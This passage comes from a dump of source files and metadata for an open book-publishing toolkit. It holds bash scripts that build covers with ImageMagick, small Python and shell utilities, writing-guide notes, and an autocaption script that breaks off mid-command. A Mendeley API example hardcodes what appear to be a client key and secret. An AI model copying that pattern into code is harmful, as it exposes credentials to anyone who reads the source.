topsectionpixels=$rounded ; done\n\t\techo \"topsectionpixels is \" $topsectionpixels\n\n\n\t\ttitleheight_step1=$(( $topsectionpixels - $frontpagetopcushion ))\n\t\ttitleheight=$(( $titleheight_step1 / 2 ))\n\t\tsubtitleheight_step1=$(( $topsectionpixels - $frontpagetopcushion ))\n\t\tsubtitleheight=$(( $subtitleheight_step1 / 2 ))\n\n#\t\tif [ $subtitle = \"none\" ] ; then\n#\t\t\ttitleheight=$(( $titleheight * 2 ))\n#\t\t\tsubtitleheight=0\n#\t\t\techo \"no subtitle, so big title\"\n#\t\telse\n#\t\t\techo \"creating both title and subtitle blocks\"\n#\t\tfi\n\n\t\techo \"title block is \" $titleheight \"pixels high\"\n\t\techo \"subtitle block is \" $subtitleheight \"pixels high\"\n\n\t\timageheightfloat=`python -c \"print($safepageheight*0.382)\"`\n\t\tfor rounded in $(printf %.0f $imageheightfloat); do imageheight=$rounded ; done\n\t\techo \"imageheight is calculated as\" $imageheight\n\n\t\t# adjust imageheight to provide a 20-px buffer around the image so that it does not bump into the title or byline boxes\n\t\timagebuffer=20\n\n\t\timageheight=$(( $imageheight - $imagebuffer -$imagebuffer ))\n\n\t\tbottomsectionpixelsfloat=`python -c \"from math import ceil ;print ceil($safepageheight*0.31)\"`\n\t\t\t\tfor rounded in $(printf %.0f $bottomsectionpixelsfloat); do bottomsectionpixels=$rounded ; done\n\t\techo \"bottomsectionpixels is \" $bottomsectionpixels\n\n\t\tbylinevertical_step1=$(( $bottomsectionpixels - $frontpagebottomcushion ))\n\t\tbylinevertical=$(( $bylinevertical_step1 / 2 ))\n\t\tlogotypevertical_step1=$(( $bottomsectionpixels - $frontpagebottomcushion ))\n\t\tlogotypevertical=$(( $logotypevertical_step1 / 4 ))\n\n\t\techo \"bylinevertical is \" $bylinevertical\n\t\techo \"logotypevertical is \" $logotypevertical\n\n\n\t\tbylinetopheight=$(( $safepageheight - $bylinevertical ))\n\t\tlogotypetopheight=$(( $safepageheight - $logotypevertical ))\n\n\t\techo \"calculated bylinetopheight as \" $bylinetopheight\n\t\techo \"calculated logotypetopheight as \" $logotypetopheight\n\n\t\t# build the title caption\n\n\n\n\t\tconvert -background $newcovercolor -fill \"$coverfontcolor\" -gravity center -font $coverfont -size $safepagewidth$x$titleheight caption:\"$escapeseed\" images/$uuid/print/titlecaption.png\n\n\t\t# build the subtitle caption\n\n\n\t\tconvert -background $newcovercolor -fill \"$coverfontcolor\" -gravity center -font $coverfont -size $safepagewidth$x$subtitleheight caption:\"$subtitle\" images/$uuid/print/subtitlecaption.png\n\n\t\t# build the byline caption\n\n\t\tbylineheight=$(( $safepageheight / 10 ))\n\n\t\tconvert -background $newcovercolor -fill \"$coverfontcolor\" -gravity center -font $coverfont -size $safepagewidth$x$bylineheight caption:\"$author\" images/$uuid/print/bylinecaption.png\n\n\t\t# build the Nimble Books logotype caption\n\n\t\t# calculate the space available for logotype\n\n\t\tsafelogotype=$(( $safepagewidth ))\n\t\tlogotypeheight=$(( $safepageheight / 20 ))\n\n\t\techo \"calculated safe area for logotype as \" $safelogotype\n\n\t\tconvert -size $safelogotype$x$logotypeheight -background $newcovercolor -fill \"$coverfontcolor\" -gravity center -font $coverfont caption:\"Nimble Books LLC\" images/$uuid/print/logotypecaption.png\n\n# import the image and get it into right format and size\n\n\t\techo \"imagefilename is \" $imagefilename\n\n\t\t# how big is the initial image and how many dpi\n\n\t\tinitialheight=`identify -format \"%h\" images/$imagefilename`\n\t\tinitialwidth=`identify -format \"%w\" 
images/$imagefilename`\n\t\tinitialxdensity=`identify -format \"%x\" images/$imagefilename`\n\t\tinitialydensity=`identify -format \"%y\" images/$imagefilename`\n\t\techo \"initialheight and initialwidth were \"$initialheight \"and \" $initialwidth\n\t\techo \"initialxdensity and initialydensity were \"$initialxdensity \"and \" $initialydensity\n\t\tinitialxdensity_num=`echo $initialxdensity | sed 's/\\([0-9]*\\).*/\\1/'\n`\n\t\tinitialydensity_num=`echo $initialydensity | sed 's/\\([0-9]*\\).*/\\1/'\n`\n\t\tif [ \"$initialxdensity_num\" -lt \"72\" ] ; then\n\t\t\techo \"xdensity is less than 72; image must be 72 dpi; exiting ...\"\n\t\t\texit 1\n\t\telse\n\t\t\techo \"x dpi ok\"\n\t\tfi\n\t\t\n\t\tif [ $initialydensity_num -lt 72 ] ; then\n\t\t\techo \"ydensity is less than 72; image must be 72 dpi; exiting ...\"\n\t\t\texit 1\n\t\telse\n\t\t\techo \"y dpi ok\"\n\t\tfi\n\n\t\tconvert images/$imagefilename -resize $imageheight$x$pagewidth\\> images/$uuid/print/$sku\"frontimage\".png\n\n\t\tresizedwidth=`identify -format \"%w\" images/$uuid/print/$sku\"frontimage\".png`\n\t\tresizedheight=`identify -format \"%h\" images/$uuid/print/$sku\"frontimage\".png`\n\t\techo \"resized image width is \" $resizedwidth\n\t\techo \"resized image height is \" $resizedheight\n\n\t# begin laying down the objects on the front page\n\n\t# lay the spine on top of the canvas\n\n\t\tconvert images/$uuid/print/bottomcanvas.png \\\n\t\timages/$uuid/print/spinecaption.png -geometry +$spineleftmargin+150 -composite \\\n\t\timages/$uuid/print/$sku.png\n\n\t## lay the ISBN box at the bottom left corner of the back page\n\n\t\n\t\tconvert images/$uuid/print/$sku.png \\\n\t\timages/$uuid/print/ISBN$sku.png -geometry +$ISBNxlocation+$ISBNylocation -composite \\\n\t\timages/$uuid/print/$sku.png\n\n\t## lay the title on top of the front page\n\n\t\tfrontpagetitletop=$(( $bleed + $frontpagetopcushion ))\n\t\tconvert images/$uuid/print/$sku.png \\\n\t\timages/$uuid/print/titlecaption.png -geometry +$frontpageflushleftmargin+$frontpagetitletop -composite \\\n\t\timages/$uuid/print/$sku.png\n\n\t## lay the subtitle on top of the front page\n\n\t\tfrontpagesubtitletop=$(( $bleed + $frontpagetopcushion + $titleheight ))\n\t\tconvert images/$uuid/print/$sku.png \\\n\t\timages/$uuid/print/subtitlecaption.png -geometry +$frontpageflushleftmargin+$frontpagesubtitletop -composite \\\n\t\timages/$uuid/print/$sku.png\n\n\t## lay the front image in the center of the front page\n\n\t\tfrontpageimagetop=$(( 300 + $titleheight ))\n\n\t\techo \"calculated frontpageimagetop as\" $frontpageimagetop\n\n\t\tfrontpageimagetop=$(( $frontpageimagetop - $imagebuffer ))\n\t\techo \"adjusted frontpageimagetop with image buffer\"\n\n\t\tfrontpageimage_whitespace=$(( $pagewidth - $resizedwidth ))\n\t\techo \"calculated frontpageimage_whitespace as \" $frontpageimage_whitespace\n\t\tfrontpageimage_offset=$(( $frontpageimage_whitespace / 2 ))\n\t\tfrontpageimageleftmargin=$(( $pagewidth + $spinepixels + $frontpageimage_offset ))\n\t\techo \"calculated frontpageimageleftmargin as\" $frontpageimageleftmargin\n\n\t\tconvert images/$uuid/print/$sku.png \\\n\t\timages/$uuid/print/$sku\"frontimage.png\" -geometry +\"$frontpageimageleftmargin\"+$frontpageimagetop -composite \\\n\t\timages/$uuid/print/$sku.png\n\n\t## lay down the byline\n\n\n\t\tconvert images/$uuid/print/$sku.png \\\n\t\timages/$uuid/print/bylinecaption.png -geometry +\"$frontpageflushleftmargin\"+$bylinetopheight -composite images/$uuid/print/$sku.png\n\n\t## lay down the Nimble logotype on 
the front cover\n\n\t\tlogotypetopheight=$(( $safepageheight - $bylineheight + 75 ))\n\n\t\tconvert images/$uuid/print/$sku.png \\\n\t\timages/$uuid/print/logotypecaption.png -geometry +\"$frontpageflushleftmargin\"+$logotypetopheight -composite images/$uuid/print/$sku.png\n\n\t## lay down the Nimble Books LLC on the spine\n\n\t\tspinecaptiontop=$(( $safepageheight - 600 ))\n\t\techo \"calculated spinecaptiontop as \" $spinecaptiontop\n\t\tconvert images/$uuid/print/$sku.png \\\n\t\timages/$uuid/print/spinenimblecaption.png -geometry +$spineleftmargin+$spinecaptiontop -composite \\\n\t\timages/$uuid/print/$sku.png\n\n\t;;\n\n\n3) \n\n\techo \"design using single hi res image for entire cover\"\n\n\t;;\n\n4) \n\n\techo \"design using simple image for top half of front cover\"\n\n\t;;\n\n5) \n\n\techo \"design using carousel of images for front cover\"\n\n\t;;\n\n*) \n\techo \"no cover design chosen, exiting\"\n\texit 3\n\t;;\n\nesac\n\n# convert RGB to CMYK\n\nconvert images/$uuid/print/$sku.png -colorspace CMYK images/$uuid/print/$sku.cmyk.pdf\n\n# build front cover for e-books and metadata\n\nfrontpageleftmarginwithsafety=$(( $spineleftmargin + $spinepixels ))\n\nconvert images/$uuid/print/$sku.png -crop $pagewidth$x$pageheight+$frontpageleftmarginwithsafety+$bleed images/$uuid/print/$sku\"_front_cover.jpg\"\n\necho \"built front cover at images/\"$uuid\"/print/\"$sku\"_front_cover.jpg\"\n\n\n## housekeeping\n#cp $scriptpath$imagedir$uuid/print/$sku\".png\" $mediatargetpath$uuid/print/$sku\".png\"\n\n#echo \"wrote print cover \"$scriptpath$imagedir$uuid/print$sku\".png\" >> $sfb_log\n" }, { "alpha_fraction": 0.8500000238418579, "alphanum_fraction": 0.8500000238418579, "avg_line_length": 29, "blob_id": "238f6a82e2e08e31c487b04476398535ac1a7547", "content_id": "747c947690a5a102bc17ab24b2af1a2dc709e2dd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 60, "license_type": "permissive", "max_line_length": 40, "num_lines": 2, "path": "/conf/jobprofiles/authorbios/KATIP_1.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "handsome strong sporty good fine helpful\nnice gamer fighter\n" }, { "alpha_fraction": 0.5966587066650391, "alphanum_fraction": 0.6157518029212952, "avg_line_length": 31.230770111083984, "blob_id": "ac8993a429ce1f67a6435e9c29ef9ccbdb03b021", "content_id": "3e129c05cdb6d51174cd495b40700f7b544ee5a3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 419, "license_type": "permissive", "max_line_length": 69, "num_lines": 13, "path": "/scripts/bin/extractPDFtitles.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# pyPdf available at http://pybrary.net/pyPdf/\nfrom pyPdf import PdfFileWriter, PdfFileReader\nimport os\n\nfor fileName in os.listdir('.'):\n try:\n if fileName.lower()[-3:] != \"pdf\": continue\n input1 = PdfFileReader(file(fileName, \"rb\"))\n \n # print the title of document1.pdf\n print('##1', fileName, '##2', input1.getDocumentInfo().title)\n except:\n print('##1', fileName, '##2')\n" }, { "alpha_fraction": 0.681506872177124, "alphanum_fraction": 0.6952054500579834, "avg_line_length": 96, "blob_id": "3efe1420f30e20037165d311d0a96c578c2594d3", "content_id": "e7709f3d6895cf417509e56c16c744fdc514a28c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 292, "license_type": 
"permissive", "max_line_length": 243, "num_lines": 3, "path": "/test/urltest_bwv29", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# runs ccc with $url parameter set\nbin/create-catalog-entry.sh --builder \"yes\" --booktitle \"BWV 29\" --yourname \"All of Bach\" --jobprofilename \"default\" --import \"no\" --passuuid \"$uuid\" --seedfile \"seeds/null\" --imprint \"pagekicker\" --analyze_url \"http://allofbach.com/en/bwv/bwv-29/\" \n" }, { "alpha_fraction": 0.6392694115638733, "alphanum_fraction": 0.6415525078773499, "avg_line_length": 61.57143020629883, "blob_id": "a0753cb9f4e7e3d8aee4453ea1d9e21c457a1d3a", "content_id": "50b22edf50111cd629e15259450b2e823d8c230a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 438, "license_type": "permissive", "max_line_length": 125, "num_lines": 7, "path": "/scripts/includes/topics_covered_runon.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo '\\pagenumbering{gobble}' > $TMPDIR$uuid/topics_covered.md\necho \" \" >> \"$TMPDIR$uuid/topics_covered.md\"\necho \"# Topics Covered\" >> \"$TMPDIR\"$uuid/topics_covered.md\necho \" \" >> \"$TMPDIR$uuid/topics_covered.md\"\ncat \"$TMPDIR\"$uuid/seeds/filtered.pagehits | awk '{printf(\"%s, \",$0)}' | sed 's/,\\s*$//' >> \"$TMPDIR$uuid/topics_covered.md\"\necho \" \" >> \"$TMPDIR$uuid/topics_covered.md\"\necho \" \" >> \"$TMPDIR$uuid/topics_covered.md\"\n" }, { "alpha_fraction": 0.8056265711784363, "alphanum_fraction": 0.8132992386817932, "avg_line_length": 34.181819915771484, "blob_id": "394e3d0b49016b13b59c7515237bb4f99666a829", "content_id": "d3cf02caac29f954f35c0c9f172cfa386fbde6f2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 391, "license_type": "permissive", "max_line_length": 184, "num_lines": 11, "path": "/scripts/bin/ubuntu-installer.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# installs dependencies for PageKicker\n\nsudo apt-get install xmlstarlet default-jre pdftk fdupes pdfimages imagemagick sendemail pandoc python-numpy python-sklearn python-networkx python-nltk #python libraries for python 2.7\n\npip3 install scikit-learn networkx alchemyapi nltk time wikipedia scipy numpy \n\n# font management\n\n# hard-configure stopwords file in IBM Wordcloud\n\n\n\n\n" }, { "alpha_fraction": 0.7532203197479248, "alphanum_fraction": 0.7742372751235962, "avg_line_length": 27.346153259277344, "blob_id": "13ec7a42cc43ac18168811ba4cdacad918311c41", "content_id": "101abd79dc0a5f1f4e86c56a5d9b6dd2d5d5536b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1475, "license_type": "permissive", "max_line_length": 72, "num_lines": 52, "path": "/scripts_python_3/includes/Tiphys-search-by-keyword.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nMendeley Open API Example Client\n\nCopyright (c) 2010, Mendeley Ltd. 
<[email protected]>\n\nPermission to use, copy, modify, and/or distribute this software for any\npurpose with or without fee is hereby granted, provided that the above\ncopyright notice and this permission notice appear in all copies.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\nWITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\nMERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\nANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\nWHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\nACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\nOR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\nFor details of the Mendeley Open API see http://dev.mendeley.com/\n\nExample usage:\n\npython test.py\n\n\"\"\"\n\nfrom pprint import pprint\nfrom mendeley_client import MendeleyClient\nimport json\n#import os\n\nmendeley = MendeleyClient('13a47f20711f5d5ffe8e8f4db1df1daa04f8bd9b6', '394d64a2907f23c7f6ea5d94fb386865')\n\ntry:\n mendeley.load_keys()\nexcept IOError:\n mendeley.get_required_keys()\n mendeley.save_keys()\n\n\n\nsearchterm = input('Enter search term: ')\npprint(searchterm)\n\ndocuments = mendeley.search(searchterm, items=20)\npprint(documents)\n\ndocuments = mendeley.search(searchterm, items=20)\nfor i in range(0, len(documents)):\n docDetails =mendeley.details(documents[i]['uuid'])\n pprint(docDetails)\n\n" }, { "alpha_fraction": 0.7887282967567444, "alphanum_fraction": 0.805202305316925, "avg_line_length": 68.16000366210938, "blob_id": "e7b3ae72949347214c83869a35a8a9264eaa48cd", "content_id": "acc946e26bccc390e9babbc326287e7400331257", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3476, "license_type": "permissive", "max_line_length": 511, "num_lines": 50, "path": "/docs/Executive_Summary_Design_Notes.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\n\nREFERENCES\n\nU.S. Navy: How to Write a Good Executive summary\nhttp://www.med.navy.mil/sites/nmcphc/Documents/environmental-programs/risk-communication/Appendix_E_AGuideToWritingAnEffectiveExecutiveSummary.pdf\n\nKeep it simple\nKeep it short\nAvoid technical language, jargon, and acronyms\nUse subheadings and bullet points\nHighlight main points\nProvide conclusions and recommendations\nConsider your audience\nAvoid confusing or emotional language\nProof read and spell check\nBe logical, clear and interesting\n\nHarvard Kennedy School Guide:\n\nhttps://www.hks.harvard.edu/ocpa/cms/files/communications-program/writing-resources/writing-public-speaking-handouts/HO_HERMAN-Exec-Summary_2-14-13.pdf\n... these characteristics answer the core questions a decision maker must know immediately: WHO, WHAT, WHY, and HOW, with WHEN and WHERE included immediately...\n\nstructure attached\n\nStanford Law School\nTips for Writing Policy Papers\nA Policy Lab Communications Workshop\nhttp://law.stanford.edu/wp-content/uploads/sites/default/files/child-page/441583/doc/slspublic/White%20Papers%20Guidelines.docx\n\nThe Executive Summary serves as a starting point – but also the end point – for the policy paper. It telegraphs your key recommendations, relying on your authority as a researcher or expert in your field. It not only summarizes your key points for the busy reader, but highlights the recommendations in a memorable way to guide future discussions. 
Think of it through the lens of your decision maker: What key points best prepare your decision maker to remember and understand your research and recommendations?\nAs a general rule, the executive summary is no more than 5% of the full length of the paper, so a 100-page white paper might have a 5-page executive summary. This is merely a rule of thumb. Your executive summary should be as long as it needs to be to summarize your key points.\n1) Motivation/problem statement: Why do we care about the problem? What practical, theoretical, legal, sociological, or policy gap does your research address? How does your work contribute to the field? How does it intersect—or not—with other scholars work in the field?\n2) Methods/procedure/approach: What did you do to get your results? What methods did you use—e.g., developed and analyzed surveys, completed a series of multivariate regressions, analyzed the legislative history of the issue, interviewed stakeholders, etc.\n3) Results/findings/recommendations: As a result of your analysis, what did you learn/recommend?\n4) Conclusions/implications: What are the larger implications of your findings? How do they help readers understand the problem? How do they help decision makers understand/solve the problem? How do they help identify the gap in existing research? Are there next steps in pursuing research on the issue?\nA useful way to draft your introduction is the journalist’s “Who / What / Why / How” heuristic\n\n\nWikipedia:\nhttps://en.wikipedia.org/wiki/Executive_summary\nbe approximately 5-10% of the length of the main report[8][10]\nbe written in language appropriate for the target audience[7][10]\nconsist of short, concise paragraphs[7][10]\nbegin with a summary[7][10]\nbe written in the same order as the main report[6][8]\nonly include material present in the main report[6][8]\nmake recommendations[7][10]\nprovide a justification[7][10]\nhave a conclusion[7][8][10]\nbe readable separately from the main report[6][7][8]\nsometimes summarize more than one document[7]\n" }, { "alpha_fraction": 0.5976963639259338, "alphanum_fraction": 0.6141952872276306, "avg_line_length": 31.00332260131836, "blob_id": "5226954ca193c5c13075304b9590484cef5545e9", "content_id": "51d2326ee34a617abb445392d5236c4a371aabd2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 9637, "license_type": "permissive", "max_line_length": 113, "num_lines": 301, "path": "/scripts/bin/autocaption.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\n# Developed by Fred Weinhaus 2/3/2010 .......... 
revised 2/3/2010\n# \n# USAGE: autocaption -s size -t text [-b buffer] [-f font] [-c color] [-u undercolor] infile outfile\n# USAGE: autocaption [-h or -help]\n# \n# OPTIONS:\n# \n# -s size size of square textbox; integer>0\n# -t text text to apply to image; enclose in quotes\n# -b buffer buffer or padding around text box; integer>=0; \n# default=0\n# -f font font name or path to font file; default=Helvetica\n# -c color text color; any valid IM color specification;\n# default will be either black or white, whichever \n# contrasts best with the color of the region that \n# was found by the search\n# -u undercolor undercolor for text; any valid IM color \n# specification; default=none for transparent so that \n# image coloration shows behind text\n# \n###\n# \n# NAME: AUTOCAPTION \n# \n# PURPOSE: To place text automatically in a specified square size region that \n# has the least color variation throughout the image.\n# \n# DESCRIPTION: AUTOCAPTION places text automatically in a specified square size \n# region that has the least color variation throughout the image. By default \n# the text will be placed on the image with no undercolor. But an undercolor \n# can be used which will cover the underlying image.\n# \n# \n# ARGUMENTS: \n# \n# -s size ... SIZE of square textbox. Also used to find the location in the \n# image that has the least color variation. The text will be placed in multiple \n# rows as determined by the textbox size.\n#\n# -t text ... TEXT to apply to image. Be sure to enclose in quotes.\n# \n# -b buffer ... BUFFER is the amount of padding around the textbox. Values are \n# integers greater than zero. The default=0.\n# \n# -f font ... FONT is the text font or path to the font file. The default is \n# Helvetica.\n# \n# -c color ... COLOR is the text color. Any valid IM color specification is \n# allowed. The default will be either black or white, whichever contrasts best \n# with the color of the region that was found by the search.\n# \n# -u undercolor ... UNDERCOLOR is the color to use under the text within the \n# textbox. Any valid IM color specification is allowed. The default=none, which \n# means that the text will be placed over the image without any undercolor. If \n# an undercolor is specified, then it will cover the underlying image.\n# \n# CAVEAT: No guarantee that this script will work on all platforms, \n# nor that trapping of inconsistent parameters is complete and \n# foolproof. Use At Your Own Risk. 
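\n# \n# Illustrative usage (hypothetical example values, not from the original header):\n#   autocaption -s 200 -t \"Storm over the harbor\" -c white photo.jpg photo_captioned.jpg\n# This would place white text in the 200x200 region of photo.jpg with the least\n# color variation.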
\n# \n######\n# \n\n# set default values\nsize=\"\"\t\t\t\t\t# size of square match window\npad=0\t\t\t\t\t# match window pad\ncolor=\"\"\t\t\t\t# text color; default black or white depending upon grayscale\nucolor=\"none\"\t\t\t# text under color; default transparent\nfont=\"Helvetica\"\t\t# font name or path to font\ntext=\"\"\n\n# set directory for temporary files\ndir=\".\" # suggestions are dir=\".\" or dir=\"/tmp\"\n\n# set up functions to report Usage and Usage with Description\nPROGNAME=`type $0 | awk '{print $3}'` # search for executable on path\nPROGDIR=`dirname $PROGNAME` # extract directory of program\nPROGNAME=`basename $PROGNAME` # base name of program\nusage1() \n\t{\n\techo >&2 \"\"\n\techo >&2 \"$PROGNAME:\" \"$@\"\n\tsed >&2 -n '/^###/q; /^#/!q; s/^#//; s/^ //; 4,$p' \"$PROGDIR/$PROGNAME\"\n\t}\nusage2() \n\t{\n\techo >&2 \"\"\n\techo >&2 \"$PROGNAME:\" \"$@\"\n\tsed >&2 -n '/^######/q; /^#/!q; s/^#*//; s/^ //; 4,$p' \"$PROGDIR/$PROGNAME\"\n\t}\n\n\n# function to report error messages\nerrMsg()\n\t{\n\techo \"\"\n\techo $1\n\techo \"\"\n\tusage1\n\texit 1\n\t}\n\n\n# function to test for minus at start of value of second part of option 1 or 2\ncheckMinus()\n\t{\n\ttest=`echo \"$1\" | grep -c '^-.*$'` # returns 1 if match; 0 otherwise\n [ $test -eq 1 ] && errMsg \"$errorMsg\"\n\t}\n\n# test for correct number of arguments and get values\nif [ $# -eq 0 ]\n\tthen\n\t# help information\n echo \"\"\n usage2\n exit 0\nelif [ $# -gt 14 ]\n\tthen\n\terrMsg \"--- TOO MANY ARGUMENTS WERE PROVIDED ---\"\nelse\n\twhile [ $# -gt 0 ]\n\t\tdo\n\t\t\t# get parameter values\n\t\t\tcase \"$1\" in\n\t\t -h|-help) # help information\n\t\t\t\t\t echo \"\"\n\t\t\t\t\t usage2\n\t\t\t\t\t exit 0\n\t\t\t\t\t ;;\n\t\t\t\t-s) # get size\n\t\t\t\t\t shift # to get the next parameter\n\t\t\t\t\t # test if parameter starts with minus sign \n\t\t\t\t\t errorMsg=\"--- INVALID SIZE SPECIFICATION ---\"\n\t\t\t\t\t checkMinus \"$1\"\n\t\t\t\t\t size=`expr \"$1\" : '\\([0-9]*\\)'`\n\t\t\t\t\t [ \"$size\" = \"\" ] && errMsg \"--- SIZE=$size MUST BE A POSITIVE INTEGER VALUE (with no sign) ---\"\n\t\t\t\t\t ;;\n\t\t\t\t-t) # get text\n\t\t\t\t\t shift # to get the next parameter\n\t\t\t\t\t # test if parameter starts with minus sign \n\t\t\t\t\t #errorMsg=\"--- INVALID FONT SPECIFICATION ---\"\n\t\t\t\t\t #checkMinus \"$1\"\n\t\t\t\t\t text=\"$1\"\n\t\t\t\t\t ;;\n\t\t\t\t-b) # get buffer\n\t\t\t\t\t shift # to get the next parameter\n\t\t\t\t\t # test if parameter starts with minus sign \n\t\t\t\t\t errorMsg=\"--- INVALID BUFFER SPECIFICATION ---\"\n\t\t\t\t\t checkMinus \"$1\"\n\t\t\t\t\t buffer=`expr \"$1\" : '\\([0-9]*\\)'`\n\t\t\t\t\t [ \"$buffer\" = \"\" ] && errMsg \"--- BUFFER=$buffer MUST BE A NON-NEGATIVE INTEGER VALUE (with no sign) ---\"\n\t\t\t\t\t ;;\n\t\t\t\t-f) # get font\n\t\t\t\t\t shift # to get the next parameter\n\t\t\t\t\t # test if parameter starts with minus sign \n\t\t\t\t\t errorMsg=\"--- INVALID FONT SPECIFICATION ---\"\n\t\t\t\t\t checkMinus \"$1\"\n\t\t\t\t\t font=\"$1\"\n\t\t\t\t\t ;;\n\t\t\t\t-c) # get color\n\t\t\t\t\t shift # to get the next parameter\n\t\t\t\t\t # test if parameter starts with minus sign \n\t\t\t\t\t errorMsg=\"--- INVALID COLOR SPECIFICATION ---\"\n\t\t\t\t\t checkMinus \"$1\"\n\t\t\t\t\t color=\"$1\"\n\t\t\t\t\t ;;\n\t\t\t\t-u) # get ucolor\n\t\t\t\t\t shift # to get the next parameter\n\t\t\t\t\t # test if parameter starts with minus sign \n\t\t\t\t\t errorMsg=\"--- INVALID UCOLOR SPECIFICATION ---\"\n\t\t\t\t\t checkMinus \"$1\"\n\t\t\t\t\t 
ucolor=\"$1\"\n\t\t\t\t\t ;;\n\t\t\t\t -) # STDIN and end of arguments\n\t\t\t\t\t break\n\t\t\t\t\t ;;\n\t\t\t\t-*) # any other - argument\n\t\t\t\t\t errMsg \"--- UNKNOWN OPTION ---\"\n\t\t\t\t\t ;;\n\t\t \t *) # end of arguments\n\t\t\t\t\t break\n\t\t\t\t\t ;;\n\t\t\tesac\n\t\t\tshift # next option\n\tdone\n\t#\n\t# get infile and outfile\n\tinfile=$1\n\toutfile=$2\nfi\n\n# test that infile provided\n[ \"$infile\" = \"\" ] && errMsg \"NO INPUT FILE SPECIFIED\"\n\n# test that outfile provided\n[ \"$outfile\" = \"\" ] && errMsg \"NO OUTPUT FILE SPECIFIED\"\n\n# test if no test or no size specified\n[ \"$text\" = \"\" ] && errMsg \"--- SOME TEXT MUST BE SPECIFIED ---\"\n[ \"$size\" = \"\" ] && errMsg \"--- TEXTBOX SIZE MUST BE SPECIFIED ---\"\n\n# setup temp files\ntmpA1=\"$dir/autocaption_1_$$.mpc\"\ntmpB1=\"$dir/autocaption_1_$$.cache\"\ntmpA2=\"$dir/autocaption_2_$$.mpc\"\ntmpB2=\"$dir/autocaption_2_$$.cache\"\ntmpA3=\"$dir/autocaption_3_$$.mpc\"\ntmpB3=\"$dir/autocaption_3_$$.cache\"\n\ntrap \"rm -f $tmpA1 $tmpB1 $tmpA2 $tmpB2 $tmpA3 $tmpB3; exit 0\" 0\ntrap \"rm -f $tmpA1 $tmpB1 $tmpA2 $tmpB2 $tmpA3 $tmpB3; exit 1\" 1 2 3 15\n\n\n# read the input image and filter image into the temp files and test validity.\nconvert -quiet -regard-warnings \"$infile\" +repage \"$tmpA1\" ||\n\terrMsg \"--- FILE $infile DOES NOT EXIST OR IS NOT AN ORDINARY FILE, NOT READABLE OR HAS ZERO SIZE ---\"\n\n\n# get image width and height\nwidth=`convert $tmpA1 -ping -format \"%w\" info:`\nheight=`convert $tmpA1 -ping -format \"%h\" info:`\n\n\n# get padded size of window\nsizep=`convert xc: -format \"%[fx:$size+2*$pad]\" info:`\n\n\n# get -blur radius from padded size\nrad=`convert xc: -format \"%[fx:floor($sizep/2)]\" info:`\n\n\n# get crop offsets to correct for window center to upper left corner\nxoff=$rad\nyoff=$rad\nwwc=`convert xc: -format \"%[fx:$width-2*$xoff]\" info:`\nhhc=`convert xc: -format \"%[fx:$height-2*$yoff]\" info:`\n\n# get std = sqrt( ave(x^2) - ave(x)^2 )\n# second line get average of squared image\n# third line get average\n# fourth line get square of average\n# fifth line delete temps\n# sixth line get std\n# seventh line get equal average of 3 channels std, then negate \n# so best result is largest (white)\nconvert $tmpA1 \\\n\t\\( -clone 0 -clone 0 -compose multiply -composite -virtual-pixel black -blur ${rad}x65000 \\) \\\n\t\\( -clone 0 -virtual-pixel black -blur ${rad}x65000 \\) \\\n\t\\( -clone 2 -clone 2 -compose multiply -composite \\) \\\n\t-delete 0,2 +swap \\\n\t-compose minus -composite -gamma 2 \\\n\t-colorspace OHTA -channel R -separate +channel -negate -depth 8 \\\n\t-crop ${wwc}x${hhc}+${xoff}+${yoff} +repage $tmpA2\n\n# find location of max\nmax=`convert $tmpA2 -format \"%[fx:round(255*maxima)]\" info:`\ndata=`compare -metric rmse $tmpA2 \\\n\t\\( -size 1x1 xc:\"gray($max)\" \\) null: 2>&1 |\\\n\ttr -cs \".0-9\\n\" \" \"`\n\n# get window score and location\nscore=`echo \"$data\" | cut -d\\ -f2`\nxxm=`echo \"$data\" | cut -d\\ -f3`\nyym=`echo \"$data\" | cut -d\\ -f4`\n\n# get black or white text color\n\tif [ \"$color\" = \"\" ]; then\n\t\tif [ \"$ucolor\" = \"none\" ]; then\n\t\t\tgray=`convert $tmpA2[${sizep}x${sizep}+${xxm}+${yym}] \\\n\t\t\t\t-filter box -resize 1x1\\! 
